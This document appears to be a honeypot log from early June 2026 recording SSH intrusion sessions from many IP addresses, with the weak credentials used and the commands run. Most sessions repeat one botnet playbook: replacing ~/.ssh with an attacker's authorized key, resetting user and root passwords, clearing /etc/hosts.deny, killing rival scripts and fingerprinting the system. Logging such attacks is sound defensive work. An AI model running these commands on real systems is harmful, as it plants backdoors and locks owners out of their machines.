$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_34 (37.255.239.81) β€” Isfahan, Iran Β· 1 session Β· 1 cmd
2026-06-05 18:23 EDT Β· as root/123456
CPU profiling
$ echo "TEST"; echo -n "System :"; lsb_release -d | awk -F':' '{print " "$2}'; echo -n "Apt : "; which apt; echo -n "Cpu speed :"; cat /proc/cpuinfo | grep 'cpu MHz' | uniq | awk -F: '{printf " %.3f\n", $2}'; echo -n "Cpu count : "; nproc; echo -n "Memory : "; free -h | awk '/Mem:/ {print $2}' // CPU profiling
🎭 wraith_6 (41.93.32.48) β€” Dar es Salaam, Tanzania Β· 1 session Β· 20 cmds
2026-06-05 17:56 EDT Β· as git/123
CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nj1Z6avM6rQu3\nj1Z6avM6rQu3"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nj1Z6avM6rQu3\nj1Z6avM6rQu3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 capoeira_root_5 (43.157.163.155) β€” SΓ£o Paulo, Brazil Β· 2 sessions Β· 40 cmds
2026-06-05 17:16 EDT Β· as ava/ava123, chita/chita
CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "chita\naa0Ip5F72C2j\naa0Ip5F72C2j"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "chita\naa0Ip5F72C2j\naa0Ip5F72C2j\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ava123\nPBJe6wTWFTDW\nPBJe6wTWFTDW"|passwd|bash
$ echo "ava123\nPBJe6wTWFTDW\nPBJe6wTWFTDW\n"|passwd
🎭 lotus_root_8 (4.247.141.61) β€” Pune, India Β· 1 session Β· 19 cmds
2026-06-05 17:43 EDT Β· as root/dell
CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:TpXlpND9DZSf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 borscht_root_2 (194.190.153.226) β€” Moscow, Russia Β· 2 sessions Β· 39 cmds
2026-06-05 00:42 EDT Β· as clean/123456, root/peng123456
CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nb9agTyscHRhT\nb9agTyscHRhT"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nb9agTyscHRhT\nb9agTyscHRhT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:xfD7yIdtPWvZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 lantern_root_10 (115.190.173.110) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-05 17:14 EDT Β· as master/123
CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nCLrQm1gt056G\nCLrQm1gt056G"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nCLrQm1gt056G\nCLrQm1gt056G\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bear (195.122.253.45) β€” Nizhniy Novgorod, Russia Β· 1 session Β· 20 cmds
2026-06-05 17:12 EDT Β· as clean/123456
CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\ntKLCkofMHxJH\ntKLCkofMHxJH"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\ntKLCkofMHxJH\ntKLCkofMHxJH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_9 (114.32.151.97) β€” Sanchong District, Taiwan Β· 1 session Β· 20 cmds
2026-06-05 17:08 EDT Β· as chita/chita
CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "chita\nFvDCIViFnj7r\nFvDCIViFnj7r"|passwd|bash
$ Enter new UNIX password:
$ echo "chita\nFvDCIViFnj7r\nFvDCIViFnj7r\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_35 (163.7.9.55) β€” Banguntapan, Indonesia Β· 1 session Β· 19 cmds
2026-06-05 16:57 EDT Β· as root/123456Q!
CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:caEztre3Y8bi"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root (171.244.38.3) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-06-05 16:23 EDT Β· as pi/raspberry
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 gouda (95.85.226.199) β€” Amsterdam, Netherlands Β· 1 session Β· 20 cmds
2026-06-05 15:58 EDT Β· as simpeg/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nF5FFDEN7G3N5\nF5FFDEN7G3N5"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nF5FFDEN7G3N5\nF5FFDEN7G3N5\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_root_4 (45.153.34.186) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-06-05 14:28 EDT Β· as amine/amine, support/support
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 lantern_root_11 (101.96.199.249) β€” Haidian, China Β· 1 session Β· 1 cmd
2026-06-05 14:50 EDT Β· as root/------fuck------
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 cipher_4 (61.222.211.114) β€” Daan, Taiwan Β· 1 session Β· 20 cmds
2026-06-05 13:53 EDT Β· as harsh/harsh
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "harsh\neItD4IA6nc1h\neItD4IA6nc1h"|passwd|bash
$ Enter new UNIX password:
$ echo "harsh\neItD4IA6nc1h\neItD4IA6nc1h\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_11 (14.103.112.1) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-05 10:59 EDT Β· as punit/punit@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "punit@123\nXML1wCPtdwWb\nXML1wCPtdwWb"|passwd|bash
$ Enter new UNIX password:
$ echo "punit@123\nXML1wCPtdwWb\nXML1wCPtdwWb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 sensei (43.133.194.186) β€” Tokyo, Japan Β· 1 session Β· 20 cmds
2026-06-05 10:28 EDT Β· as surya/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nLi3z1pcIjbZn\nLi3z1pcIjbZn"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nLi3z1pcIjbZn\nLi3z1pcIjbZn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_13 (23.95.191.250) β€” Buffalo, United States Β· 4 sessions Β· 79 cmds
2026-06-02 08:30 EDT Β· as ftpuser/ftpuser0, manager/friend, root/China@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:A0f9ylTCmlH6"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "friend\nlwhMG3ZWHefq\nlwhMG3ZWHefq"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "friend\nlwhMG3ZWHefq\nlwhMG3ZWHefq\n"|passwd
$ echo -e "user53\nDNHeccDmmz6L\nDNHeccDmmz6L"|passwd|bash
$ echo "user53\nDNHeccDmmz6L\nDNHeccDmmz6L\n"|passwd
$ echo -e "ftpuser0\ns8JTItVQZ5NW\ns8JTItVQZ5NW"|passwd|bash
$ echo "ftpuser0\ns8JTItVQZ5NW\ns8JTItVQZ5NW\n"|passwd
🎭 capoeira_root_6 (102.211.152.138) β€” Fortaleza, Brazil Β· 2 sessions Β· 39 cmds
2026-05-28 22:26 EDT Β· as adminsys/123, root/China@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
